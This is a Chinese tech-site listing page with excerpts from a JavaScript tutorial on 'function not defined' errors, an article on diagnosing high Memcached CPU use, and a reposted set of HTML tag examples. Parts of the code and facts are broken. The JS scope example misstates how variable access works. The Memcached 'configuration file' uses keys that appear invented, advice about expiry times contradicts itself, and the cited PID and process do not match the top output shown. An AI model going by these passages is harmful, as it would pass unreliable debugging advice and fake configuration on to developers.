2023-08-10 14:14:15
282
初心未变-t
CSS
...L结构如下: php-template 这是一个标题 这是一段文字。 我们可以使用CSS来设置这个标题的字体大小和颜色,以及这段文字的行高和颜色。下面是相应的CSS代码: css .container { background-color: f0f0f0; } .title { font-size: 2em; color: 333; } .para { line-height: 1.5; color: 666; } 这样,我们就成功地设置了容器的背景色,标题的字体大小和颜色,以及段落的行高和颜色。这就是CSS的基本用法,也是我们在后续讨论中需要用到的基础知识。 第3章 JS函数未定义的原因 回到我们一开始提出的问题,“js函数未定义是怎么回事?”这个问题实际上是在问:“为什么我在某个地方使用了一个函数,但是却出现了函数未定义的错误?”这个问题的答案可能有很多,下面我们一一来看一下。 第一个可能的原因是,我们确实没有定义这个函数。比如说,我们有一个名为helloWorld的函数,但是在其他地方却忘记定义它了。这种情况简直是最直截了当的啦,解决起来也超级简单,你只需要在需要用到这个函数的地方给它加上一个定义就OK啦,就像给菜加点盐那么简单。 javascript function helloWorld() { console.log("Hello, world!"); } helloWorld(); // 输出 "Hello, world!" 第二个可能的原因是,我们虽然定义了这个函数,但是在使用的时候却拼错了函数名或者写错了参数。这种情况也比较多见,特别是在大型项目中,很容易出现这种错误。 javascript function helloWorld() { console.log("Hello, world!"); } helloWord(); // 报错,因为函数名拼错了 第三个可能的原因是,我们使用的函数在一个作用域内是可以访问的,但是在另一个作用域内却不可以访问。这种情况比较复杂,需要我们深入理解作用域的概念才能解决。 javascript let x = 1; if (true) { function foo() { console.log(x); // 输出 1 } } else { function foo() { console.log(x); // 报错,因为x在else的作用域内不可访问 } } foo(); // 报错,因为foo在if的作用域外不可访问 以上就是“js函数未定义是怎么回事”的一些可能原因,我们在日常开发中需要根据具体的情况进行分析和处理。 第4章 如何避免“js函数未定义”的问题? 避免“js函数未定义”的问题,其实有很多方法。下面我们就来介绍一些常用的技巧。 首先是要注意命名规范。当我们在创建函数的时候,可别忘了给它起个既规范又有意思的名字。就像咱们常说的“驼峰式命名法”,就是一种挺实用的命名规则,你可以把函数名想象成一只可爱的小骆驼,每个单词首字母都像驼峰一样高高地耸起来,这样一来,不仅看起来顺眼,读起来也朗朗上口,更容易让人记住。这样可以让我们的代码更加清晰易懂,也可以减少出错的可能性。 其次是要注意作用域的限制。在JavaScript这个编程语言里,每个函数都拥有自己的独立小天地,也就是作用域。这就意味着,当我们呼唤一个函数来干活的时候,得留个心眼儿,千万要注意别跨出这个小天地去调用还没被定义过的函数,否则就可能闹出“函数未定义”的乌龙事件。 最后是要注意版本兼容性。假如我们正在玩转一些最新的JavaScript黑科技,但心里也得惦记着那些还在用老旧浏览器的用户群体。这就意味着,咱们还得琢磨琢磨怎么在这些老爷爷级别的浏览器上,找到能兼容这些新特性的备选方案,让它们也能顺畅运行起来。这就意味着咱们得摸清楚各个浏览器的不同版本之间是怎么个兼容法,还有学会如何运用各种小工具和技巧来对付这些可能出现的兼容性问题。 总之,“js函数未定义”的问题是一个比较常见的问题,但是只要我们注意一些基本的原则和技巧,就能够有效地避免这个问题。希望本文能够对你有所帮助,如果你还有其他的问题,欢迎随时联系我。
2023-08-12 12:30:02
429
岁月静好_t
MemCache
...耗过多的资源。 示例代码如下: python import memcache mc = memcache.Client(['localhost:11211']) mc.set('key', 'value', 120) 上述代码中,设置的数据过期时间为120秒,即两分钟。这就意味着,即使数据已经没啥用了,Memcached这家伙还是会死拽着这些数据不放,在接下来的两分钟里持续占据着CPU资源不肯放手。 2. Memcached与大量客户端交互 当Memcached与大量客户端频繁交互时,会加重其CPU负担。这是因为每次交互都需要进行复杂的计算和数据处理操作。比如,想象一下你运营的Web应用火爆到不行,用户请求多得不得了,每个请求都得去Memcached那儿抓取数据。这时候,Memcached这个家伙可就压力山大了,CPU资源被消耗得嗷嗷叫啊! 示例代码如下: python import requests for i in range(1000): response = requests.get('http://localhost/memcached/data') print(response.text) 上述代码中,循环执行了1000次HTTP GET请求,每次请求都会从Memcached获取数据。这会导致Memcached的CPU资源消耗过大。 三、排查Memcached进程占用CPU高的方法 1. 使用top命令查看CPU使用情况 在排查Memcached进程占用CPU过高的问题时,我们可以首先使用top命令查看系统中哪些进程正在占用大量的CPU资源。例如,以下输出表示PID为31063的Memcached进程正在占用大量的CPU资源: javascript top - 13:34:47 up 1 day, 6:13, 2 users, load average: 0.24, 0.36, 0.41 Tasks: 174 total, 1 running, 173 sleeping, 0 stopped, 0 zombie %Cpu(s): 0.2 us, 0.3 sy, 0.0 ni, 99.5 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st KiB Mem : 16378080 total, 16163528 free, 182704 used, 122848 buff/cache KiB Swap: 0 total, 0 free, 0 used. 2120360 avail Mem PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND 3106 root 20 0 1058688 135484 4664 S 45.9 8.3 1:23.79 python memcached_client.py 我们可以看到,PID为31063的Python程序正在占用大量的CPU资源。接着,我们可以使用ps命令进一步了解这个进程的情况: bash ps -p 3106 2. 查看Memcached配置文件 在确认Memcached进程是否异常后,我们需要查看其配置文件,以确定是否存在配置错误导致的高CPU资源消耗。例如,以下是一个默认的Memcached配置文件(/etc/memcached.conf)的一部分: php-template Default MaxItems per key (65536). default_maxbytes 67108864 四、解决Memcached进程占用CPU高的方案 1. 调整Memcached配置 根据Memcached配置不当的原因,我们可以调整相关参数来降低CPU资源消耗。例如,可以减少过期时间、增大最大数据大小等。以下是修改过的配置文件的一部分: php-template Default MaxItems per key (131072). default_maxbytes 134217728 Increase expiration time to reduce CPU usage. default_time_to_live 14400 2. 控制与Memcached的交互频率 对于因大量客户端交互导致的高CPU资源消耗问题,我们可以采取一些措施来限制与Memcached的交互频率。例如,可以在服务器端添加限流机制,防止短时间内产生大量请求。或者,优化客户端代码,减少不必要的网络通信。 3. 提升硬件设备性能 最后,如果其他措施都无法解决问题,我们也可以考虑提升硬件设备性能,如增加CPU核心数量、扩大内存容量等。但这通常不是最佳解决方案,因为这可能会带来更高的成本。 五、结论 总的来说,Memcached进程占用CPU过高是一个常见的问题,其产生的原因是多种多样的。要真正把这个问题给揪出来,咱们得把系统工具和实际操作的经验都使上劲儿,得像钻井工人一样深入挖掘Memcached这家伙的工作内幕和使用门道。只有这样,才能真正找到问题的关键所在,并提出有效的解决方案。 感谢阅读这篇文章,希望对你有所帮助!
2024-01-19 18:02:16
94
醉卧沙场-t
转载文章
...de>一段电脑代码</code><br><samp>计算机样本</samp><br><kbd>键盘输入</kbd><br><var>变量</var></body></html 2、HTML <audio> 标签 <audio> 标签是 HTML5 提供的用来播放音频文件的。 <!DOCTYPE html><html><head> <meta charset="utf-8"> <title>W3Cschool(w3cschool.cn)</title> </head><body><audio controls><source src="/statics/demosource/horse.ogg" ><source src="/statics/demosource/horse.mp3" >您的浏览器不支持 audio 元素。</audio></body></html> 3、HTML <area> 标签 <area> 标签可以在图像上划分区域,这些区域是可以点击的,并且对应不同的操作。 <!DOCTYPE html><html><head><meta charset="utf-8"><title>W3Cschool(w3cschool.cn)</title></head><body><p>点击太阳或其他行星,注意变化:</p><img src="/statics/images/course/planets.gif" width="145" height="126" alt="Planets" usemap="planetmap"><map name="planetmap"><area shape="rect" coords="0,0,82,126" target="_blank" alt="Sun" href="/statics/images/course/sun.gif"><area shape="circle" coords="90,58,3" target="_blank" alt="Mercury" href="/statics/images/course/merglobe.gif"><area shape="circle" coords="124,58,8" target="_blank" alt="Venus" href="/statics/images/course/venglobe.gif"></map></body></html> 4、HTML <select> 标签定义及使用说明 <select> 元素用来创建下拉列表。 <!DOCTYPE html><html><head><meta charset="utf-8"> <title>W3Cschool(w3cschool.cn)</title> </head><body><select><option value="volvo" style="display:none">Volvo</option><option value="saab">Saab</option><option value="opel">Opel</option><option value="audi">Audi</option></select></body></html> 5、HTML <style> 标签 <style> 标签包含了 HTML 文档的样式详细,在默认情况下,在该元素内写入的样式指令将被认为是CSS。 <!DOCTYPE html><html><head><meta charset="utf-8"> <title>W3Cschool(w3cschool.cn)</title><style type="text/css">h1 {color:red;}p {color:blue;}</style></head><body><h1>这是一个标题</h1><p>这是一个段落。</p></body></html> 7、HTML <sub> 标签 包含在 <sub> 标签和其结束标签 </sub> 中的内容会以正常内容的一半的高度显示在下方,而且通常较小,请参见下述例子: <!DOCTYPE html><html><head> <meta charset="utf-8"> <title>W3Cschool教程(w3cschool.cn)</title> </head><body><p>这个文本包含 <sub>下标</sub>文本。</p><p>这个文本包含 <sup>上标</sup> 文本。</p></body></html> 8、HTML <summary> 标签 <summary> 标签元素作为一个<datails>元素的标题,该标题可以包含详细的信息,但是默认情况下不显示,需要单击才能显示详细信息,请参考下述示 <!DOCTYPE html><html><head> <meta charset="utf-8"> <title>W3Cschool(w3cschool.cn)</title> </head><body><details><summary>Copyright 1999-2011.</summary><p> - by Refsnes Data. All Rights Reserved.</p><p>All content and graphics on this web site are the property of the company Refsnes Data.</p></details><p><b>注意:</b>目前只有 Chrome 和 Safari 6 支持 summary 标签。</p></body></html> 9、HTML <table> 标签 <table> 标签用来定义 HTML 表格,一个简单的 HTML 表格应该包括两行两列,如下述示例所示: <!DOCTYPE html><html><head> <meta charset="utf-8"> <title>W3Cschool教程(w3cschool.cn)</title> </head><body><table border="1"><tr><th>Month</th><th>Savings</th></tr><tr><td>January</td><td>$100</td></tr><tr><td>February</td><td>$80</td></tr></table></body></html> 10、HTML <textarea> 标签 <textarea> 标签表示多行纯文本编辑控件,用户可在其文本区域中写入文本,请参考下述示例: <!DOCTYPE html><html><head> <meta charset="utf-8"> <title>W3Cschool 在线教程(w3cschool.cn)</title> </head><body><textarea rows="10" cols="30">我是一个文本框。</textarea></body></html> 11、HTML <tt> 标签 - HTML5 不支持 <tt> 标签用来改变字体样式,使标签中的文本显示为打字机文本,请参考下述例子: <!DOCTYPE html><html><body><p>This text is normal.</p><p><tt>This text is teletype text.</tt></p></body></html> 12、HTML <u> 标签 <u> 标签可以用来对标签内的文本实现下划线样式,请参考下述示例: <!DOCTYPE html><html><body><p>This is a <u>parragraph</u>.</p></body></html> 13、HTML <ul> 标签 <ul> 标签表示HTML页面中项目的无序列表,一般会以项目符号列表呈现,请参考下述例子: <!DOCTYPE html><html><head><meta charset="utf-8"> <title>W3Cschool(w3cschool.cn)</title> </head><body><h4>无序列表:</h4><ul><li>咖啡</li><li>茶</li><li>牛奶</li></ul></body></html> 14、HTML <video> 标签 <video> 标签可以将视频内容嵌入到HTML文档中,请参考下述示例: <!DOCTYPE html><html><body><video width="320" height="240" controls><source src="/statics/demosource/movie.mp4" type="video/mp4"><source src="/statics/demosource/movie.ogg" type="video/ogg">您的浏览器不支持 HTML5 video 标签。</video></body></html> 15、HTML <ol> 标签 <ol> 标签在 HTML 中表示有序列表,是 ordered lists 的缩写。您可以自定义有序列表的初始序号,请参考下面的实例: <!DOCTYPE html><html><head><meta charset="utf-8"> <title>W3Cschool(w3cschool.cn)</title> </head><body><ol><li>咖啡</li><li>茶</li><li>牛奶</li></ol><ol start="50"><li>咖啡</li><li>茶</li><li>牛奶</li></ol></body></html> 16、HTML <noframes> 标签HTML5不支持该标签 <noframes> 标签用于支持不支持 <frame> 元素的浏览器,请参考下面的示例: <html><head><meta charset="utf-8"> <title>W3Cschool(w3cschool.cn)</title> </head><frameset cols="25%,50%,25%"><frame src="/statics/demosource/frame_a.htm"><frame src="/statics/demosource/frame_b.htm"><frame src="/statics/demosource/frame_c.htm"><noframes>抱歉,您的浏览器不支持 frame 属性!</noframes></frameset></html> 17、HTML <hr> 标签 <hr> 标签表示段落级元素之间的主题划分。例如,在下面的实例中我们对具有主题变化的内容使用了 <hr> 标签: <!DOCTYPE html><html><head> <meta charset="utf-8"> <title>W3Cschool(w3cschool.cn)</title> </head><body><h1>HTML</h1><p>HTML 是用于描述 web 页面的一种语言。</p><hr><h1>CSS</h1><p>CSS 定义如何显示 HTML 元素。</p></body></html> 18、HTML <h1> - <h6> 标签 <h1> - <h6> 标签用来定义 HTML 标题,表示了 HTML 网页中六个级别的标题。您可以通过下面的这个实例来看看每个级别的标题有什么区别: <!DOCTYPE html><html><head><meta charset="utf-8"><title>W3Cschool(w3cschool.cn)</title></head><body><h1>这是标题1</h1><h2>这是标题2</h2><h3>这是标题 3</h3><h4>这是标题 4</h4><h5>这是标题 5</h5><h6>这是标题 6</h6></body></html> 19、HTML <center> 标签 - HTML 5 不支持 <center> 标签控制文本的居中显示,不能在 HTML5 中使用。 <!DOCTYPE html><html><head> <meta charset="utf-8"> <title>W3Cschool(w3cschool.cn)</title> </head><body><p>这是一些文本。</p><center>这个文本居中对齐。</center><p>这是一些文本</p></body></html> 20、HTML <button> 标签 <button> 标签用来设置 HTML 中的按钮。 <!DOCTYPE html><html><head> <meta charset="utf-8"> <title>W3Cschool(w3cschool.cn)</title> </head><body><button type="button" onclick="alert('Hello world!')">Click Me!</button></body></html> 21、HTML <br> 标签 <br> 标签是空标签,可插入一个简单的换行符。 <!DOCTYPE html><html><head> <meta charset="utf-8"> <title>W3Cschool(w3cschool.cn)</title> </head><body><p>使用br元素<br>在文本中<br>换行。</p></body></html> 22、HTML <dt> 标签 <dt> 标签只能够作为 <dl> 标签的一个子元素出现,常常后跟一个 <dd> 标签。 <!DOCTYPE html><html><head> <meta charset="utf-8"> <title>W3Cschool(w3cschool.cn)</title> </head><body><dl><dt>咖啡</dt><dd>黑色的热饮</dd><dt>牛奶</dt><dd>白色的冷饮</dd></dl></body></html> 23、HTML <fieldset> 标签 <fieldset> 标签内的一组表单元素会在 WEB 浏览器中以特殊的方式显示,比如不同样式的边界、3D效果等。 <!DOCTYPE html><html><head> <meta charset="utf-8"> <title>W3Cschool(w3cschool.cn)</title> </head><body><form><fieldset><legend>个人信息:</legend>姓名: <input type="text"><br>邮箱: <input type="text"><br>生日: <input type="text"></fieldset></form></body></html> 24、HTML <embed> 标签 <embed> 标签用来定义在页面中嵌入的内容,比如插件。比如,在下面的实例中我们嵌入了一个 flash 动画: <!DOCTYPE html><html><head> <meta charset="utf-8"> <title>W3Cschool(w3cschool.cn)</title> </head><body><embed src="/statics/demosource/helloworld.swf" tppabs="http://W3Cschool.com/tags/helloworld.swf"></body></html> 25、HTML <font> 标签 - HTML5 不支持 <font> 标签的使用示例如下所示,该标签已经过时,因此我们不建议您使用该标签。 <!DOCTYPE html><html><head> <meta charset="utf-8"> <title>W3Cschool(w3cschool.cn)</title> </head><body><p><font size="3" color="red">这是一些文本!</font></p><p><font size="2" color="blue">这是一些文本!</font></p><p><font face="verdana" color="green">这是一些文本!</font></p></body></html> 26、HTML <label> 标签 <label> 标签是一种常见的表单控件,触发对应表单控件功能,让用户在使用表单的时候能够有更好的体验。参考下述的实例: <!DOCTYPE html><html><head> <meta charset="utf-8"> <title>W3Cschool(w3cschool.cn)</title> </head><body><p>点击其中一个文本标签选中选项:</p><form action="/statics/demosource/demo-form.php"><label for="male">Male</label><input type="radio" name="sex" id="male" value="male"><br><label for="female">Female</label><input type="radio" name="sex" id="female" value="female"><br><br><input type="submit" value="提交"></form></body></html> 记录一些重要标签! 本篇文章为转载内容。原文链接:https://blog.csdn.net/chehec2010/article/details/85060460。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。
2023-10-11 23:43:21
296
转载
站内搜索
用于搜索本网站内部文章,支持栏目切换。
知识学习
实践的时候请根据实际情况谨慎操作。
随机学习一条linux命令:
tar -czvf archive.tar.gz dir
- 创建一个gzip压缩的tar归档文件。
推荐内容
推荐本栏目内的其它文章,看看还有哪些文章让你感兴趣。
2023-04-28
2023-08-09
2023-06-18
2023-04-14
2023-02-18
2023-04-17
2024-01-11
2023-10-03
2023-09-09
2023-06-13
2023-08-07
2023-03-11
历史内容
快速导航到对应月份的历史文章列表。
随便看看
拉到页底了吧,随便看看还有哪些文章你可能感兴趣。
时光飞逝
"流光容易把人抛,红了樱桃,绿了芭蕉。"